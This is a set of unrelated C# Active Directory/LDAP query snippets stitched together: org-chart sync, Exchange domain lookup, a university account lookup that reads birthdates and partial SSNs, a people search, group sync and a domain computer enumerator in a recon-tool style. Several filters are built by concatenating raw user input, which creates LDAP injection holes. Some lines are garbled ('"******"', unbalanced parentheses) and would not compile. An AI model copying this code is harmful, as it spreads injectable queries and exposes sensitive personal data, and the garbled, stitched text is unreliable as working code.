} } IPathAnalyse analyse = null; analyse = (IPathAnalyse)Activator.CreateInstance("Yinhe.ProcessingCenter", pathAnalyseClass).Unwrap();//"Yinhe.ProcessingCenter.SynAD.PathAnalyseXH" if (analyse != null) { if (String.IsNullOrEmpty(dep.Name) == false) { dep.Code = analyse.GetDepCode(dep.Path); dep.Level = analyse.GetDepLevel(dep.Path); dep.ParentName = analyse.GetDepParentName(dep.Path); dep.GrandParentName = analyse.GetGrandParentName(dep.Path); if (pathAnalyseClass != "Yinhe.ProcessingCenter.SynAD.PathAnalyseHQC") //中海投资 { dep.Guid = result.GetDirectoryEntry().Guid.ToString(); } else { if (dep.ParentName.ToLower() == "cn=org") { dep.ParentName = "华侨城组织架构"; } if (dep.GrandParentName.ToLower() == "cn=org") { dep.GrandParentName = "华侨城组织架构"; } } } depList = analyse.GetDepListFilter(depList, dep); } Console.WriteLine(dep.Name); } } } } catch (Exception ex) { Console.WriteLine(ex.Message); } return(depList); }
internal static string GetFullyQualifiedDomainName(string DomainController) { TaskLogger.LogEnter(); DirectoryEntry directoryEntry = null; DirectoryEntry directoryEntry2 = null; DirectorySearcher directorySearcher = null; SearchResultCollection searchResultCollection = null; int num; try { string path = NewOwaVirtualDirectory.LDAPPrefix(DomainController) + "RootDSE"; directoryEntry = new DirectoryEntry(path); directoryEntry2 = new DirectoryEntry(NewOwaVirtualDirectory.LDAPPrefix(DomainController) + directoryEntry.Properties["configurationNamingContext"].Value); directorySearcher = new DirectorySearcher(directoryEntry2); directorySearcher.Filter = "(&(objectClass=msExchRecipientPolicy)(msExchPolicyOrder=2147483647))"; directorySearcher.PropertiesToLoad.Add("gatewayProxy"); directorySearcher.SearchScope = SearchScope.Subtree; searchResultCollection = directorySearcher.FindAll(); foreach (object obj in searchResultCollection) { SearchResult searchResult = (SearchResult)obj; ResultPropertyValueCollection resultPropertyValueCollection = searchResult.Properties["gatewayProxy"]; foreach (object obj2 in resultPropertyValueCollection) { string text = obj2.ToString(); if (text.StartsWith("SMTP:")) { num = text.IndexOf('@'); if (num >= 0) { TaskLogger.LogExit(); return(text.Substring(num + 1)); } } } } } catch (COMException ex) { throw new IISGeneralCOMException(ex.Message, ex.ErrorCode, ex); } finally { if (searchResultCollection != null) { searchResultCollection.Dispose(); } if (directorySearcher != null) { directorySearcher.Dispose(); } if (directoryEntry2 != null) { directoryEntry2.Dispose(); } if (directoryEntry != null) { directoryEntry.Dispose(); } } TaskLogger.LogExit(); string hostName = Dns.GetHostName(); IPHostEntry hostEntry = Dns.GetHostEntry(hostName); string hostName2 = hostEntry.HostName; num = hostName2.IndexOf('.'); return((num >= 0 && num < hostName2.Length - 1) ? hostName2.Substring(num + 1) : hostName2); }
/// <summary> /// 搜索用户 /// </summary> /// <param name="path"></param> /// <param name="objFilter"></param> /// <param name="dicPropertes"></param> /// <returns></returns> public List <ADUser> SearchUser(string path, string objFilter, Dictionary <string, string> dicPropertes, string pathAnalyseClass) { List <ADUser> userList = new List <ADUser>(); string[] arrPropertes = dicPropertes.Keys.ToArray(); try { path = "LDAP://" + (String.IsNullOrEmpty(this.Domain) == false ? this.Domain : "") + path; DirectoryEntry root = null; if (authorizeType == AuthorizeType.anonymous) { root = new DirectoryEntry(path, "", "", AuthenticationTypes.Anonymous); } else if (authorizeType == AuthorizeType.none) { root = new DirectoryEntry(path, this.UserName, this.PassWord, AuthenticationTypes.None); } if (root != null) { Console.WriteLine(root.Path); using (DirectorySearcher searcher = new DirectorySearcher()) { searcher.SearchRoot = root; searcher.SearchScope = SearchScope.Subtree; searcher.Filter = objFilter; searcher.PageSize = 10000; searcher.PropertiesToLoad.AddRange(arrPropertes); SearchResultCollection results = searcher.FindAll(); StringBuilder summary = new StringBuilder(); foreach (SearchResult result in results) { ADUser user = new ADUser(); foreach (string propName in result.Properties.PropertyNames) { //Console.WriteLine("字段名称:{0}, 字段值:{1}\n", propName, result.Properties[propName][0].ToString()); if (dicPropertes.Keys.Contains(propName) == true) { if (dicPropertes[propName] != null) { user.SetDynamicProperty(dicPropertes[propName].ToString(), result.Properties[propName][0].ToString()); } } } //Console.ReadLine(); IPathAnalyse analyse = null; analyse = (IPathAnalyse)Activator.CreateInstance("Yinhe.ProcessingCenter", pathAnalyseClass).Unwrap(); if (analyse != null) { if (String.IsNullOrEmpty(user.Name) == false) { if (pathAnalyseClass != "Yinhe.ProcessingCenter.SynAD.PathAnalyseHQC") { user.Guid = result.GetDirectoryEntry().Guid.ToString(); user.Code = analyse.GetUserCode(user.Path); user.DepartMentID = analyse.GetUserDepartment(user.Path); user.GrandDepartMentID = analyse.GetUserGrandDepartment(user.Path); } else { user.DepartMentGuid = user.Code; } } userList = analyse.GetUserListFilter(userList, user); } } } } } catch (Exception ex) { Console.WriteLine(ex.Message); } return(userList); }
private void runSearch(string pantherID, string fiuUsername) { String output = "", emplOutput = "", studentOutput = "", visitorOutput = "", macOutput = ""; if (pantherID.Length == 7 || fiuUsername != "") // Panther ID { DirectorySearcher emplDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/)); if (fiuUsername != "") { emplDS.Filter = "(&((&(objectCategory=Person)))(sAMAccountName=" + fiuUsername + "))"; } else { emplDS.Filter = "(&((&(objectCategory=Person)))(EmployeeID=" + pantherID + "))"; } SearchResult emplSR = emplDS.FindOne(); if (emplSR != null) { ResultPropertyCollection emplResult = emplSR.Properties; foreach (string myKey in emplResult.PropertyNames) { emplOutput += myKey + " = "; foreach (Object myCollection in emplResult[myKey]) { emplOutput += myCollection + " "; } emplOutput += Environment.NewLine; } try { output += "Name: " + emplSR.Properties["displayName"][0]; } catch (Exception) { output += "Name: N/A"; } output += Environment.NewLine + "-----------------------" + Environment.NewLine; try { output += "Username: "******"sAMAccountName"][0] + Environment.NewLine; } catch (Exception) { output += "Username: N/A\n"; } try { output += "Panther ID: " + emplSR.Properties["EmployeeID"][0] + Environment.NewLine; } catch (Exception) { output += "Panther ID: N/A" + Environment.NewLine; } try { int accountState = Convert.ToInt32(emplSR.Properties["userAccountControl"][0]); if (accountState.Equals(544) | accountState.Equals(512)) { output += "Status: Enabled" + Environment.NewLine; } else if (accountState.Equals(546)) { output += "Status: Disabled" + Environment.NewLine; } else { output += "Status: Other" + Environment.NewLine; } } catch (Exception e) { output += "Status: Unknown" + Environment.NewLine; ; } try { output += "Department: " + emplSR.Properties["department"][0].ToString() + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += "Department: Unknown" + Environment.NewLine + Environment.NewLine; } output += "Demographic Information" + Environment.NewLine + "----------------------------" + Environment.NewLine; try { output += "Date of Birth: " + emplSR.Properties["fiubirthdate"][0] + Environment.NewLine; } catch (Exception) { output += "Date of Birth: N/A" + Environment.NewLine; } try { output += "Last 4 SSN: " + emplSR.Properties["fiul4ssn"][0] + Environment.NewLine; } catch (Exception) { output += "Last 4 SSN: N/A" + Environment.NewLine; } try { output += "Zip Code: " + emplSR.Properties["fiucontactzip"][0] + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += "Zip Code: N/A" + Environment.NewLine + Environment.NewLine; } output += "Extra Information" + Environment.NewLine + "-----------------------" + Environment.NewLine; try { long expirationTime = (long)emplSR.Properties["accountExpires"][0]; if (expirationTime > 0) { output += "**ACCOUNT TO EXPIRE ON " + DateTime.FromFileTime(expirationTime) + "**" + Environment.NewLine; } } catch (Exception e) { output += ""; } try { output += "Lync Enabled: " + emplSR.Properties["msRTCSIP-UserEnabled"][0] + Environment.NewLine; } catch (Exception e) { output += "MS Lync Enabled: Unknown" + Environment.NewLine; } try { String mail = emplSR.Properties["mail"][0].ToString(); } catch { } String targetaddress = ""; try { targetaddress = emplSR.Properties["targetaddress"][0].ToString(); } catch { } String homemdb = ""; try { homemdb = emplSR.Properties["homemdb"][0].ToString(); } catch { } if (!(targetaddress.Equals("")) && !(homemdb.Equals(""))) { output += "Mailbox Type: Unknown" + Environment.NewLine; // may be broken } else if ((targetaddress.Equals("")) && !(homemdb.Equals(""))) { output += "Mailbox Type: Exchange" + Environment.NewLine; } else if (!(targetaddress.Equals("")) && (homemdb.Equals(""))) { output += "Mailbox Type: Office 365" + Environment.NewLine; } else if ((targetaddress.Equals("")) && (homemdb.Equals(""))) { output += "Mailbox Type: None" + Environment.NewLine; } else { output += "Mailbox Type: Unknown" + Environment.NewLine; } try { if ((long)emplSR.Properties["LockOutTime"][0] == 0) { output += "Locked out: False" + Environment.NewLine; } else { output += "Locked out: True" + Environment.NewLine; } } catch (Exception) { output += "Locked out: Unknown" + Environment.NewLine; } if ((long)emplSR.Properties["pwdLastSet"][0] == 0) { output += "Password Last Set : Not Set or May be Default" + Environment.NewLine; } else { output += "Password Last Set : " + DateTime.FromFileTime((long)emplSR.Properties["pwdLastSet"][0]).ToString() + Environment.NewLine; } DateTime d1 = DateTime.Now; DateTime d2 = DateTime.FromFileTime((long)emplSR.Properties["pwdLastSet"][0]); System.TimeSpan diff = d1.Subtract(d2); int daysLeft = 182 - diff.Days; // 6 months == 182.621 days if (daysLeft <= 0) { output += "**PASSWORD IS EXPIRED**" + Environment.NewLine; } else if (daysLeft <= 14) { output += String.Format("**PASSWORD WILL EXPIRE IN {0} DAY(S)**" + Environment.NewLine, daysLeft); } try { output += "Last Logon: " + DateTime.FromFileTime((long)emplSR.Properties["lastLogon"][0]) + Environment.NewLine; } catch (Exception) { output += "Last Login: Unknown" + Environment.NewLine; } try { output += "Bad Password: "******"badPasswordTime"][0]) + Environment.NewLine; } catch (Exception) { output += "Bad Password: Unknown" + Environment.NewLine; } output += "When Created: " + emplSR.Properties["whenCreated"][0] + Environment.NewLine; } else { output += ""; } DirectorySearcher studentDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); if (fiuUsername != "") { studentDS.Filter = "(&((&(objectCategory=Person)))(sAMAccountName=" + fiuUsername + "))"; } else { studentDS.Filter = "(&((&(objectCategory=Person)))(EmployeeID=" + pantherID + "))"; } SearchResult studentSR = studentDS.FindOne(); if (studentSR != null) { if (emplSR != null) { output += Environment.NewLine + "==============================" + Environment.NewLine; } ResultPropertyCollection studentResult = studentSR.Properties; foreach (string myKey in studentResult.PropertyNames) { studentOutput += myKey + " = "; foreach (Object myCollection in studentResult[myKey]) { studentOutput += myCollection + " "; } studentOutput += Environment.NewLine; } try { output += "Name: " + studentSR.Properties["displayName"][0]; } catch (Exception) { output += "Name: Unknown"; } output += Environment.NewLine + "-----------------------" + Environment.NewLine; try { output += "Username: "******"sAMAccountName"][0] + Environment.NewLine; } catch (Exception) { output += "Username: Unknown" + Environment.NewLine; } try { output += "Panther ID: " + studentSR.Properties["EmployeeID"][0] + Environment.NewLine; } catch (Exception) { output += "Panther ID: Unknown" + Environment.NewLine; } try { String fiuStatus = studentSR.Properties["fiuStatus"][0].ToString(); output += "Status: " + fiuStatus + Environment.NewLine; } catch (Exception) { output += "Status: Unknown" + Environment.NewLine; } output += Environment.NewLine + "Demographic Information" + Environment.NewLine + "----------------------------" + Environment.NewLine; try { output += "Date of Birth: " + studentSR.Properties["fiubirthdate"][0] + Environment.NewLine; } catch (Exception) { output += "Date of Birth: N/A" + Environment.NewLine; } try { output += "Last 4 SSN: " + studentSR.Properties["fiul4ssn"][0] + Environment.NewLine; } catch (Exception) { output += "Last 4 SSN: N/A" + Environment.NewLine; } try { output += "Zip Code: " + studentSR.Properties["fiucontactzip"][0] + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += "Zip Code: N/A" + Environment.NewLine + Environment.NewLine; } output += "Extra Information" + Environment.NewLine + "-----------------------" + Environment.NewLine; try { if ((long)studentSR.Properties["LockOutTime"][0] == 0) { output += "Locked out: False" + Environment.NewLine; } else { output += "Locked out: True" + Environment.NewLine; } } catch (Exception) { output += "Locked out? UNKNOWN" + Environment.NewLine; } if ((long)studentSR.Properties["pwdLastSet"][0] == 0) { output += "Password Last Set : Not Set or May be Default" + Environment.NewLine; } else { output += "Password Last Set : " + DateTime.FromFileTime((long)studentSR.Properties["pwdLastSet"][0]).ToString() + Environment.NewLine; } DateTime d1 = DateTime.Now; DateTime d2 = DateTime.FromFileTime((long)studentSR.Properties["pwdLastSet"][0]); System.TimeSpan diff = d1.Subtract(d2); int daysLeft = 182 - diff.Days; // 6 months == 182.621 days if (daysLeft <= 0) { output += "**PASSWORD IS EXPIRED**" + Environment.NewLine; } else if (daysLeft <= 14) { output += String.Format("**PASSWORD WILL EXPIRE IN {0} DAY(S)**" + Environment.NewLine, daysLeft); } try { output += "Last Logon: " + DateTime.FromFileTime((long)studentSR.Properties["lastLogon"][0]) + Environment.NewLine; } catch (Exception) { output += "Last Login: Unknown" + Environment.NewLine; } try { output += "Bad Password: "******"badPasswordTime"][0]) + Environment.NewLine; } catch (Exception) { output += "Bad Password: Unknown" + Environment.NewLine; } output += "When Created: " + studentSR.Properties["whenCreated"][0] + Environment.NewLine; } if (pantherID != "" && (emplSR != null|| studentSR !=null)) { DirectorySearcher devicesDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); devicesDS.Filter = "(&((&(objectCategory=Person)))(fiunsseowner=" + pantherID + "))"; SearchResultCollection devicesSR = devicesDS.FindAll(); if (devicesSR != null) { output += Environment.NewLine + "==============================" + Environment.NewLine; foreach (SearchResult deviceSR in devicesSR) { output += "MAC: " + deviceSR.Properties["GivenName"][0] + Environment.NewLine; output += "Description: " + deviceSR.Properties["fiuNSSEdescription"][0] + Environment.NewLine + Environment.NewLine; } } } else if(emplSR == null && studentSR == null) { output += "No Results Found" + Environment.NewLine; } } else if (pantherID.Length == 10)// Visitor Account { DirectorySearcher visitorDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); visitorDS.Filter = "(&((&(objectCategory=Person)))(CN=" + pantherID + "))"; SearchResult visitorSR = visitorDS.FindOne(); if (visitorSR != null) { ResultPropertyCollection visitorResult = visitorSR.Properties; foreach (string myKey in visitorResult.PropertyNames) { visitorOutput += myKey + " = "; foreach (Object myCollection in visitorResult[myKey]) { visitorOutput += myCollection + " "; } visitorOutput += Environment.NewLine; } try { output += "Username: "******"samaccountname"][0].ToString() + Environment.NewLine; } catch { output += "" + Environment.NewLine; } output += "-----------------------" + Environment.NewLine; try { output += "Description: " + visitorSR.Properties["fiuNSSEdescription"][0].ToString() + Environment.NewLine; } catch { output += ""; } try { output += "Email: " + visitorSR.Properties["fiunsseowner"][0].ToString() + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += ""; } output += "Extra Information" + Environment.NewLine + "-----------------------" + Environment.NewLine; output += "Registered on: " + DateTime.FromFileTime((long)visitorSR.Properties["pwdLastSet"][0]).ToString() + Environment.NewLine; output += "Expires: " + DateTime.FromFileTime((long)visitorSR.Properties["accountExpires"][0]).ToString() + Environment.NewLine; } else { } } else if (fiuUsername.Length == 17 || fiuUsername.Length == 12) // MAC Registration { String macColon = "", macDash = "", macNone = ""; if (fiuUsername.Contains(":")) { macColon = fiuUsername; macDash = fiuUsername.Replace(":", "-"); macNone = fiuUsername.Replace(":", ""); } else if (fiuUsername.Contains("-")) { macColon = fiuUsername.Replace("-", ":"); macDash = fiuUsername; macNone = fiuUsername.Replace("-", ""); } else { macColon = fiuUsername.Substring(0, 2) + ":" + fiuUsername.Substring(2, 2) + ":" + fiuUsername.Substring(4, 2) + ":" + fiuUsername.Substring(6, 2) + ":" + fiuUsername.Substring(8, 2) + ":" + fiuUsername.Substring(10, 2); macDash = fiuUsername.Substring(0, 2) + "-" + fiuUsername.Substring(2, 2) + "-" + fiuUsername.Substring(4, 2) + "-" + fiuUsername.Substring(6, 2) + "-" + fiuUsername.Substring(8, 2) + "-" + fiuUsername.Substring(10, 2); macNone = fiuUsername; } resultBox.Text = output; DirectorySearcher dsColon = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); dsColon.Filter = "(&((&(objectCategory=Person)))(CN=" + macColon + "))"; SearchResult srColon = dsColon.FindOne(); if (srColon != null) { ResultPropertyCollection macResult = srColon.Properties; foreach (string myKey in macResult.PropertyNames) { macOutput += myKey + " = "; foreach (Object myCollection in macResult[myKey]) { macOutput += myCollection + " "; } macOutput += Environment.NewLine; } output += "Registration Information\n-----------------------\n"; try { output += "Device \"Name\": " + srColon.Properties["fiuNSSEdescription"][0] + "\n"; } catch (Exception) { output += "Device \"Name\": N/A\n"; } try { output += "Device MAC Address: " + srColon.Properties["GivenName"][0] + "\n"; } catch (Exception) { } output += "Registered to: " + srColon.Properties["fiuNSSEowner"][0] + "\n\n"; output += "Extra Information\n-----------------------\n"; output += "Registered on: " + DateTime.FromFileTime((long)srColon.Properties["pwdLastSet"][0]).ToString() + "\n"; output += "Registration Expires on: " + DateTime.FromFileTime((long)srColon.Properties["accountExpires"][0]).ToString() + "\n\n"; resultBox.Text = output; } DirectorySearcher dsDash = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); dsDash.Filter = "(&((&(objectCategory=Person)))(CN=" + macDash + "))"; SearchResult srDash = dsDash.FindOne(); if (srDash != null) { ResultPropertyCollection macResult = srDash.Properties; foreach (string myKey in macResult.PropertyNames) { macOutput += myKey + " = "; foreach (Object myCollection in macResult[myKey]) { macOutput += myCollection + " "; } macOutput += Environment.NewLine; } output += "Registration Information\n-----------------------\n"; output += "Device \"Name\": " + srDash.Properties["fiuNSSEdescription"][0] + "\n"; output += "Device MAC Address: " + srDash.Properties["GivenName"][0] + "\n"; output += "Registered to: " + srDash.Properties["fiuNSSEowner"][0] + "\n\n"; output += "Extra Information\n-----------------------\n"; output += "Registered on: " + DateTime.FromFileTime((long)srDash.Properties["pwdLastSet"][0]).ToString() + "\n"; output += "Registration Expires on: " + DateTime.FromFileTime((long)srDash.Properties["accountExpires"][0]).ToString() + "\n\n"; resultBox.Text = output; } DirectorySearcher dsNone = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); dsNone.Filter = "(&((&(objectCategory=Person)))(CN=" + macNone + "))"; SearchResult srNone = dsNone.FindOne(); if (srNone != null) { ResultPropertyCollection macResult = srNone.Properties; foreach (string myKey in macResult.PropertyNames) { macOutput += myKey + " = "; foreach (Object myCollection in macResult[myKey]) { macOutput += myCollection + " "; } macOutput += Environment.NewLine; } output += "Registration Information\n-----------------------\n"; output += "Device \"Name\": " + srNone.Properties["fiuNSSEdescription"][0] + "\n"; output += "Device MAC Address: " + srNone.Properties["GivenName"][0] + "\n"; output += "Registered to: " + srNone.Properties["fiuNSSEowner"][0] + "\n\n"; output += "Extra Information\n-----------------------\n"; output += "Registered on: " + DateTime.FromFileTime((long)srNone.Properties["pwdLastSet"][0]).ToString() + "\n"; output += "Registration Expires on: " + DateTime.FromFileTime((long)srNone.Properties["accountExpires"][0]).ToString() + "\n\n"; } } else { output += "No Results Found For " + pantherID + " " + fiuUsername; } resultBox.Text = output; if (exportLogFileToolStripMenuItem.Checked == true) { using (System.IO.StreamWriter writer = new System.IO.StreamWriter(Environment.GetFolderPath(System.Environment.SpecialFolder.Personal))) { writer.WriteLine(emplOutput + Environment.NewLine + studentOutput + Environment.NewLine + visitorOutput + Environment.NewLine + macOutput); } } }
public List <Person> GetPeople(string inputUserSearch) { string[] userstofind = inputUserSearch.Split(';').Select(sValue => sValue.Trim()).ToArray(); Person uInfo = new Person(); DirectoryEntry ldapConnection = createDirectoryEntry(); DirectorySearcher ldap_searcher = new DirectorySearcher(ldapConnection); WindowsIdentity winId = (WindowsIdentity)HttpContext.Current.User.Identity; WindowsImpersonationContext impersonationContext = null; var UserList = new List <Person>(); try { foreach (string user in userstofind) { if (!string.IsNullOrEmpty(user)) { log.Info("" + winId.Name + " is searching for: " + user + ""); impersonationContext = WindowsIdentity.Impersonate(winId.Token); string filter = "(&(anr=" + user + "*)(samAccountType=805306368)(!userAccountControl:1.2.840.113556.1.4.803:=2))"; //properties to get ldap_searcher.PropertiesToLoad.Clear(); ldap_searcher.PropertiesToLoad.Add("sAMAccountName"); ldap_searcher.PropertiesToLoad.Add("title"); ldap_searcher.PropertiesToLoad.Add("cn"); ldap_searcher.PropertiesToLoad.Add("department"); ldap_searcher.PropertiesToLoad.Add("distinguishedName"); ldap_searcher.PropertiesToLoad.Add("mail"); ldap_searcher.PropertiesToLoad.Add("thumbnailPhoto"); ldap_searcher.PropertiesToLoad.Add("physicalDeliveryOfficeName"); ldap_searcher.Filter = filter; //create search collection SearchResultCollection allemployee_results = ldap_searcher.FindAll(); if (allemployee_results.Count == 0) { filter = "(&(sAMAccountName=" + user + "*)(samAccountType=805306368)(!userAccountControl:1.2.840.113556.1.4.803:=2))"; if (inputUserSearch.Contains("@")) { string convertToUsername = user.Split('@')[0]; filter = "(&(sAMAccountName=" + convertToUsername + "*)(samAccountType=805306368)(!userAccountControl:1.2.840.113556.1.4.803:=2))"; } ldap_searcher.Filter = filter; //find users allemployee_results = ldap_searcher.FindAll(); } if (allemployee_results.Count > 0) { foreach (SearchResult employeeEntryToGet in allemployee_results) { //get sAMAccountName if (employeeEntryToGet.Properties.Contains("sAMAccountName") && employeeEntryToGet.Properties["sAMAccountName"] != null) { uInfo.SAMAccountName = employeeEntryToGet.Properties["sAMAccountName"][0].ToString(); } else { uInfo.SAMAccountName = ""; } //get Full Name if (employeeEntryToGet.Properties.Contains("cn") && employeeEntryToGet.Properties["cn"] != null) { uInfo.FullName = employeeEntryToGet.Properties["cn"][0].ToString(); } else { uInfo.FullName = ""; } //get Title if (employeeEntryToGet.Properties.Contains("title") && employeeEntryToGet.Properties["title"] != null) { uInfo.Title = employeeEntryToGet.Properties["title"][0].ToString(); } else { uInfo.Title = ""; } //get Departament if (employeeEntryToGet.Properties.Contains("department") && employeeEntryToGet.Properties["department"] != null) { uInfo.Department = employeeEntryToGet.Properties["department"][0].ToString(); } else { uInfo.Department = ""; } //get Email if (employeeEntryToGet.Properties.Contains("mail") && employeeEntryToGet.Properties["mail"] != null) { uInfo.EmailAddress = employeeEntryToGet.Properties["mail"][0].ToString(); } else { uInfo.EmailAddress = ""; } //get Office if (employeeEntryToGet.Properties.Contains("physicalDeliveryOfficeName") && employeeEntryToGet.Properties["physicalDeliveryOfficeName"] != null) { uInfo.Office = employeeEntryToGet.Properties["physicalDeliveryOfficeName"][0].ToString(); } else { uInfo.Office = ""; } //get photo if (employeeEntryToGet.Properties.Contains("thumbnailPhoto") && employeeEntryToGet.Properties["thumbnailPhoto"] != null) { uInfo.HasPhoto = "Yes"; } else { uInfo.HasPhoto = "No"; } //get Distinguished Name if (employeeEntryToGet.Properties.Contains("distinguishedName") && employeeEntryToGet.Properties["distinguishedName"] != null) { uInfo.DistinguishedName = employeeEntryToGet.Properties["distinguishedName"][0].ToString(); } else { uInfo.DistinguishedName = ""; } //add user to list UserList.Add(new Person { SAMAccountName = uInfo.SAMAccountName, Title = uInfo.Title, Department = uInfo.Department, EmailAddress = uInfo.EmailAddress, Office = uInfo.Office, DistinguishedName = uInfo.DistinguishedName, FullName = uInfo.FullName, HasPhoto = uInfo.HasPhoto }); } } } } UserList = UserList.OrderBy(newlist => newlist.SAMAccountName).ToList(); } catch (Exception ex) { log.Info("" + winId.Name + " has encountered an error: " + ex.Message + ""); } finally { ldap_searcher.Dispose(); ldapConnection.Dispose(); winId.Dispose(); if (impersonationContext != null) { impersonationContext.Undo(); impersonationContext.Dispose(); } } return(UserList); }
private static Task <List <GroupEntry> > GetGroupsAsync(bool force = false) { if (!SettingsService.Instance.Sync.SyncGroups) { throw new ApplicationException("Not configured to sync groups."); } if (SettingsService.Instance.Server?.Ldap == null) { throw new ApplicationException("No configuration for directory server."); } if (SettingsService.Instance.Sync == null) { throw new ApplicationException("No configuration for sync."); } if (!AuthService.Instance.Authenticated) { throw new ApplicationException("Not authenticated."); } var groupEntry = SettingsService.Instance.Server.Ldap.GetGroupDirectoryEntry(); var originalFilter = BuildBaseFilter(SettingsService.Instance.Sync.Ldap.GroupObjectClass, SettingsService.Instance.Sync.GroupFilter); var filter = originalFilter; var revisionFilter = BuildRevisionFilter(filter, force, SettingsService.Instance.LastGroupSyncDate); var searchSinceRevision = filter != revisionFilter; filter = revisionFilter; Console.WriteLine("Group search: {0} => {1}", groupEntry.Path, filter); var searcher = new DirectorySearcher(groupEntry, filter); var result = searcher.FindAll(); var initialSearchGroupIds = new List <string>(); foreach (SearchResult item in result) { initialSearchGroupIds.Add(DNFromPath(item.Path)); } if (searchSinceRevision && !initialSearchGroupIds.Any()) { return(Task.FromResult(new List <GroupEntry>())); } else if (searchSinceRevision) { searcher = new DirectorySearcher(groupEntry, originalFilter); result = searcher.FindAll(); } var userEntry = SettingsService.Instance.Server.Ldap.GetUserDirectoryEntry(); var userFilter = BuildBaseFilter(SettingsService.Instance.Sync.Ldap.UserObjectClass, SettingsService.Instance.Sync.UserFilter); var userSearcher = new DirectorySearcher(userEntry, userFilter); var userResult = userSearcher.FindAll(); var userIdsDict = MakeIdIndex(userResult); var groups = new List <GroupEntry>(); foreach (SearchResult item in result) { var group = BuildGroup(item, userIdsDict); if (group == null) { continue; } groups.Add(group); } return(Task.FromResult(groups)); }
public static List <string> SearchLDAP(string ldap, bool verbose) { try { bool searchGlobalCatalog = true; List <string> ComputerNames = new List <string>(); string description = null; string filter = null; //https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx //https://ldapwiki.com/wiki/Active%20Directory%20Computer%20Related%20LDAP%20Query switch (ldap) { case "all": description = "all enabled computers with \"primary\" group \"Domain Computers\""; filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"); break; case "dc": description = "all enabled Domain Controllers (not read-only DCs)"; filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=8192))"); break; case "exclude-dc": description = "all enabled computers that are not Domain Controllers or read-only DCs"; filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))"); break; case "servers": searchGlobalCatalog = false; //operatingSystem attribute is not replicated in Global Catalog description = "all enabled servers"; filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*))"); break; case "servers-exclude-dc": searchGlobalCatalog = false; //operatingSystem attribute is not replicated in Global Catalog description = "all enabled servers excluding Domain Controllers or read-only DCs"; filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))"); break; default: Console.WriteLine("[!] Invalid LDAP filter: {0}", filter); Utilities.Options.Usage(); Environment.Exit(0); break; } if (searchGlobalCatalog) { try { Forest currentForest = Forest.GetCurrentForest(); GlobalCatalog globalCatalog = currentForest.FindGlobalCatalog(); DirectorySearcher globalCatalogSearcher = globalCatalog.GetDirectorySearcher(); globalCatalogSearcher.PropertiesToLoad.Add("dnshostname"); globalCatalogSearcher.Filter = filter; globalCatalogSearcher.SizeLimit = int.MaxValue; globalCatalogSearcher.PageSize = int.MaxValue; Console.WriteLine("[+] Performing LDAP query against Global Catalog for {0}...", description); Console.WriteLine("[+] This may take some time depending on the size of the environment"); foreach (SearchResult resEnt in globalCatalogSearcher.FindAll()) { //sometimes objects with empty attributes throw errors try { string ComputerName = resEnt.Properties["dnshostname"][0].ToString().ToUpper(); ComputerNames.Add(ComputerName); } catch { /*nothing*/ } } globalCatalogSearcher.Dispose(); } catch (Exception ex) { if (verbose) { Console.WriteLine("[!] LDAP Error searching Global Catalog: {0}", ex.Message); } } } else { try { DirectoryEntry entry = new DirectoryEntry(); DirectorySearcher mySearcher = new DirectorySearcher(entry); mySearcher.PropertiesToLoad.Add("dnshostname"); mySearcher.Filter = filter; mySearcher.SizeLimit = int.MaxValue; mySearcher.PageSize = int.MaxValue; Console.WriteLine("[+] Performing LDAP query against the current domain for {0}...", description); Console.WriteLine("[+] This may take some time depending on the size of the environment"); foreach (SearchResult resEnt in mySearcher.FindAll()) { //sometimes objects with empty attributes throw errors try { string ComputerName = resEnt.Properties["dnshostname"][0].ToString().ToUpper(); ComputerNames.Add(ComputerName); } catch { /*nothing*/ } } mySearcher.Dispose(); } catch (Exception ex) { if (verbose) { Console.WriteLine("[!] LDAP Error: {0}", ex.Message); } } } //localhost returns false positives ComputerNames.RemoveAll(u => u.Contains(System.Environment.MachineName.ToUpper())); Console.WriteLine("[+] LDAP Search Results: {0}", ComputerNames.Count.ToString()); return(ComputerNames); } catch (Exception ex) { if (verbose) { Console.WriteLine("[!] LDAP Error: {0}", ex.Message); } return(null); } }
public List<ComputerPrincipalFull> GetChildComputerObjects(int maxRecords) { DirectoryEntry directoryDe; if (ContextType == ContextType.Domain) { directoryDe = new DirectoryEntry(string.Format("LDAP://{0}", ConnectedServer)); } else { throw new NotSupportedException( "This functionality is only available for Domain ContextType PrincipalContext objects."); } var search = new DirectorySearcher(directoryDe) { Tombstone = false, Asynchronous = true, PageSize = 100, Filter = "(objectClass=computer)" }; var results = search.FindAll(); var i = 0; var children = new List<ComputerPrincipalFull>(); foreach (SearchResult result in results) { i++; var delims = new[] {'/'}; var pieces = result.Path.Split(delims); var dn = pieces[pieces.Count() - 1]; if (maxRecords > 0 && i > maxRecords) { break; } try { children.Add(ComputerPrincipalFull.FindByIdentity(this, IdentityType.DistinguishedName, dn)); } catch { } } return children; }
